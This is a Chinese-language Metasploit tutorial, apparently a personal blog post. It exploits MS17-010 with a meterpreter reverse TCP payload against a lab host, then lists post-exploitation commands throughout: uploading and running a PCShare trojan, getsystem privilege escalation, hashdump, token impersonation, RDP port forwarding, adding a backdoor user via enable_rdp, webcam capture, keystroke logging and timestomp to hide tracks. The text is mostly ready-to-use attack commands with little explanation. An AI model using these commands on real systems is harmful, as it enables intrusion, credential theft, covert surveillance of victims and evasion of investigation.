MSF使用
一、MSF链接目标主机
1.开启MSF控制台:msfconsole

2.搜索模块ms17-010:search ms17-010

3.使用ms17-010模块并显示选项:
使用模块:use ……(可以用模块名,也可以填写模块编号)
显示选项:show options

4.
设置目标主机IP:set RHOSTS 192.168.1.103

设置本地主机IP:set lhosts 192.168.1.108

设置payload(反向tcp链接):set payload windows/x64/meterpreter/reverse_tcp(若不设置payload那么攻击手段将会大大减少,只有shell一种)

攻击:exploit

5.使用shell模式,形同在靶机命令行操作

二、MSF后期攻击方式
1.用pcshare创建客户端,生成一个木马111.exe(IP地址为安装pcshare的物理机IP)

2.将生成的木马文件通过xshell上传到kali

3.将木马文件上传到靶机:upload //root//111.exe c://111.exe(注意:路径为双//)

结果:

4.执行木马文件

图形界面操作结果(其中各种操作自行百度吧)

5.下载文件

6.查看进程ps

7.获取权限:getsystem

8.hash破解:
获取hash值:hashdump

破解hash自行找工具或者网站
9.端口转发(将目标主机端口转发到自己的内网主机端口,访问内网主机端口即可远程控制目标主机)
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口

删除端口转发:
portfwd delete -l <portnumber> -p <portnumber> -r <Target IP>
10.查找文件

11.查看权限:getuid

12.查看系统信息sysinfo

13.提权
use incognito
use incognito(列出用户)
impersonate_token "feng-PC\Administrator"

14.摄像头操作(虚拟机没有摄像头,所以命令了解一下就不实操了)
webcam_list 查看摄像头
webcam_snap 通过摄像头拍照
webcam_stream 通过摄像头开启视频

15.修改时间戳: timestomp

16.远程连接计算机
enable_rdp脚本开启3389
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662

17.键盘记录
keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录


浙公网安备 33010602011771号